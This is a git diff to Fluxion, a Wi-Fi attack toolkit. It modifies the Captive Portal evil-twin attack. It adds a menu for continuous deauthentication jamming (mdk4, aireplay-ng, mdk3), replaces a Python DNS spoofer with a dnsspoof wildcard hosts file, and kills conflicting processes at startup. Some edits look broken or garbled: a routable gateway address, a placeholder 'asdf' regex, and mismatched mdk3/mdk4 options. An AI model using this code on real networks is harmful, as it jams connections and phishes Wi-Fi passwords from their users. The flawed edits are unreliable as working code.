diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index a2b4592..22866be 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -16,7 +16,7 @@ CaptivePortalAuthenticationMethodsInfo=( # ============= < Virtual Network Configuration > ============ # # To avoid collapsing with an already existing network, # we'll use a somewhat uncommon network and server IP. -CaptivePortalGatewayAddress="192.168.254.1" +CaptivePortalGatewayAddress="192.169.254.1" CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} @@ -116,7 +116,7 @@ captive_portal_set_ap_interface() { # interface is in used by something else (virtual reservation?). echo "Virtual interface required, attempting." > $FLUXIONOutputDevice if ! iw dev $CaptivePortalJammerInterface interface \ - add ${CaptivePortalJammerInterface}v type monitor \ + add ${CaptivePortalJammerInterface}v type managed \ 2> $FLUXIONOutputDevice; then echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" sleep 5 @@ -154,6 +154,13 @@ function captive_portal_set_ap_service() { captive_portal_unset_ap_service +echo -e "$FLUXIONVLine ${CClr}Select a method of deauthentication\n${CClr}" +echo -e "${CSRed}[${CSYel}1${CSRed}]${CClr} mdk4${CClr}" +echo -e "${CSRed}[${CSYel}2${CSRed}]${CClr} aireplay${CClr}" +echo -e "${CSRed}[${CSYel}3${CSRed}]${CClr} mdk3\n${CClr}" +read -p $'\e[0;31m[\e[1;34mfluxion\e[1;33m@\e[1;37m'"$HOSTNAME"$'\e[0;31m]\e[0;31m-\e[0;31m[\e[1;33m~\e[0;31m] \e[0m' option_deauth + + if [ "$FLUXIONAuto" ]; then CaptivePortalAPService="hostapd" else @@ -725,7 +732,7 @@ index-file.names = ( # Respond with Google's captive response on certain domains. # Domains: www.google.com, clients[0-9].google.com, connectivitycheck.gstatic.com, connectivitycheck.android.com, android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com -\$HTTP[\"host\"] =~ \"((www|(android\.)?clients[0-9]*|(alt[0-9]*-)?mtalk)\.google|connectivitycheck\.(android|gstatic))\.com\" { +\$HTTP[\"host\"] =~ \"asdf\" { server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\" url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" ) } @@ -734,7 +741,7 @@ index-file.names = ( echo "\ # Redirect all traffic to the captive portal when not emulating a connection. \$HTTP[\"host\"] != \"captive.gateway.lan\" { - url.redirect-code = 302 + url.redirect-code = 307 url.redirect = ( \"^/(.*)\" => \"http://captive.gateway.lan/\", ) @@ -742,92 +749,15 @@ index-file.names = ( " >>"$FLUXIONWorkspacePath/lighttpd.conf" fi - # Create a DNS service with python, forwarding all traffic to gateway. + # Create a temporary hosts file to be used with dnsspoof echo "\ -import sys, traceback, socket -# NOTICE: This DNS server works with python 2 and python 3 +${CaptivePortalGatewayAddress} *.* +172.217.5.238 google.com +172.217.13.78 clients3.google.com +172.217.13.78 clients4.google.com +" >"$FLUXIONWorkspacePath/hosts" -class DNSQuery: - def __init__(self, data): - self.data = data - self.domain = '' - - queryType = (ord(data[2]) >> 3) & 15 - - # Only handle basic requests. - if queryType != 0: - print('Ignoring Query: Non-spoofed type.') - return - - domainStart = 13 # Skip length byte and start at domain. - domainLength = ord(data[domainStart - 1]) # Evaluate length byte. - - while domainLength != 0: - self.domain += data[domainStart : domainStart + domainLength] + '.' - - domainStart += domainLength + 1 # Skip the length byte & start at domain. - domainLength = ord(data[domainStart - 1]) # Evaluate length byte. - - def response(self, ipv4): - if not self.domain: return '' - - packet = '' - - packet += self.data[ :2] + '\x81\x80' - packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' - packet += self.data[12:] - packet += '\xc0\x0c' - packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' - - # Convert string IPv4 quads to binary values (bytes). - packet += str.join('', map(lambda s: chr(int(s)), ipv4.split('.'))) - - return packet - -if __name__ == '__main__': - targetIPv4 = '$CaptivePortalGatewayAddress' - - print('Mini DNS Spoofer:: dom.query. 60 IN A %s' % targetIPv4) - - link = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - link.bind(('',53)) - - try: - while True: - clientData, clientIPv4 = link.recvfrom(1024) - - queryData = clientData if sys.version_info < (3, 0) else clientData.decode('unicode_escape') - - query = DNSQuery(queryData) - - response = query.response(targetIPv4) - - if sys.version_info > (3, 0): - # Someone that knows more about python and how it does byte-handling, - # please fix the following shitfest and make it a bit more elegant. - # Do what? A raw conversion of the \"response\" string to bytes. - responseHex = '' - for xx in response: - responseHex += \"%x%x\" % ((ord(xx) >> 4) & 0b1111, ord(xx) & 0b1111) - - response = bytearray.fromhex(responseHex) - - link.sendto(response, clientIPv4) - - print('Request: %s -> %s' % (query.domain, targetIPv4)) - - except KeyboardInterrupt: - print('INTERRUPT: Stopping.') - link.close() - - except Exception as error: - print('EXCEPTION: Stopping!') - print(error) - print(traceback.format_exc()) - link.close() -" >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" - - chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + #chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"} # Attack arbiter script @@ -1429,7 +1359,7 @@ stop_attack() { CaptivePortalWebServicePID="" # Clear service PID fi - # Kill python DNS service if one is found. + # Kill DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice @@ -1496,7 +1426,7 @@ start_attack() { echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ -title "FLUXION AP DNS Service" -e \ - "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & + "dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" & # Save parent's pid, to get to child later. CaptivePortalDNSServiceXtermPID=$! @@ -1519,14 +1449,28 @@ start_attack() { "./$FLUXIONWorkspacePath/captive_portal/deauth-ng.py -i $CaptivePortalJammerInterface -f 5 -c $FluxionTargetChannel -a $FluxionTargetMAC" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! - else + elif [[ $option_deauth -eq 1 ]]; then xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! + elif [[ $option_deauth -eq 2 ]]; then + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "aireplay-ng -0 0 -a $FluxionTargetMAC --ignore-negative-one $CaptivePortalJammerInterface" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! + + elif [[ $option_deauth -eq 3 ]]; then + + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk4_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! fi echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" diff --git a/attacks/Captive Portal/language/de.sh b/attacks/Captive Portal/language/de.sh index 3782dbc..87abd50 100755 --- a/attacks/Captive Portal/language/de.sh +++ b/attacks/Captive Portal/language/de.sh @@ -11,7 +11,7 @@ CaptivePortalStaringAPRoutesNotice="Starte den routing Service " CaptivePortalStartingDHCPServiceNotice="Starte den DHCP Service" CaptivePortalStartingDNSServiceNotice="Starte den DNS Service." CaptivePortalStartingWebServiceNotice="Starte den AP" -CaptivePortalStartingJammerServiceNotice="Starte mdk3 als Service" +CaptivePortalStartingJammerServiceNotice="Starte mdk4/aireplay als Service" CaptivePortalStartingAuthenticatorServiceNotice="Authentifizierungsskript wird gestartet" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalAPServiceQuery="Select an access point service" diff --git a/attacks/Handshake Snooper/language/nl.sh b/attacks/Handshake Snooper/language/nl.sh index 6bfe03c..17ea0ef 100755 --- a/attacks/Handshake Snooper/language/nl.sh +++ b/attacks/Handshake Snooper/language/nl.sh @@ -3,7 +3,7 @@ # description: Acquires WPA/WPA2 encryption hashes. # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -HandshakeSnooperJammerInterfaceQuery="Selecteer eenn interface voor monitoring & jamming." +HandshakeSnooperJammerInterfaceQuery="Selecteer een interface voor monitoring & jamming." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperMethodQuery="Selecteer een methode voor handshake verkrijgen" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passief$CClr)" @@ -23,8 +23,8 @@ HandshakeSnooperStartingArbiterNotice="${CCyn}Handshake Snooper$CClr arbiter dae HandshakeSnooperSnoopingForNSecondsNotice="Snooping voor \$HandshakeSnooperVerifierInterval seconden." HandshakeSnooperStoppingForVerifierNotice="Stop snooper & controle voor hashes." HandshakeSnooperSearchingForHashesNotice="Zoek naar hashes in het capture bestand." -HandshakeSnooperArbiterAbortedWarning="${CYel}Geannuleerd${CClr}: De operatie is geannuleerd been, geen geldige hash gevonden." -HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion's database." +HandshakeSnooperArbiterAbortedWarning="${CYel}Afgebroken${CClr}: De operatie is afgebroken, geen geldige hash gevonden." +HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion database." HandshakeSnooperArbiterCompletedTip="${CBCyn}Handshake Snooper$CBYel aanval afgerond, Sluit dit scherm en start een andere aanval.$CClr" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> diff --git a/fluxion.sh b/fluxion.sh index 38fd042..5b8605b 100755 --- a/fluxion.sh +++ b/fluxion.sh @@ -4,6 +4,10 @@ # ================== < FLUXION Parameters > ================== # # ============================================================ # # Path to directory containing the FLUXION executable script. + +for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do + killall $program &> /dev/null + done readonly FLUXIONPath=$(dirname $(readlink -f "$0")) # Path to directory containing the FLUXION library (scripts). @@ -21,8 +25,8 @@ readonly FLUXIONPreferencesFile="$FLUXIONPath/preferences/preferences.conf" readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 -readonly FLUXIONVersion=5 -readonly FLUXIONRevision=9 +readonly FLUXIONVersion=6 +readonly FLUXIONRevision=0 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 @@ -280,7 +284,7 @@ fluxion_startup() { local requiredCLITools=( "aircrack-ng" "bc" "awk:awk|gawk|mawk" "curl" "cowpatty" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" - "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" + "iwconfig:wireless-tools" "macchanger" "mdk4" "dsniff" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc" ) @@ -352,6 +356,7 @@ fluxion_shutdown() { # Only deallocate fluxion or airmon-ng created interfaces. if [[ "$interface" == "flux"* || "$interface" == *"mon"* || "$interface" == "prism"* ]]; then fluxion_deallocate_interface $interface + systemctl restart network-manager fi done fi diff --git a/lib/ap/airbase-ng.sh b/lib/ap/airbase-ng.sh index 397fada..50dba0b 100755 --- a/lib/ap/airbase-ng.sh +++ b/lib/ap/airbase-ng.sh @@ -72,7 +72,7 @@ function ap_service_start() { xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ -title "FLUXION AP Service [airbase-ng]" -e \ - airbase-ng -P -e $APServiceSSID -c $APServiceChannel \ + airbase-ng -y -e $APServiceSSID -c $APServiceChannel \ -a $APServiceMAC $APServiceInterface & local parentPID=$! @@ -81,7 +81,7 @@ function ap_service_start() { sleep 1 APServicePID=$(pgrep -P $parentPID) done - + eval ifconfig at0 192.169.254.1 ap_service_route }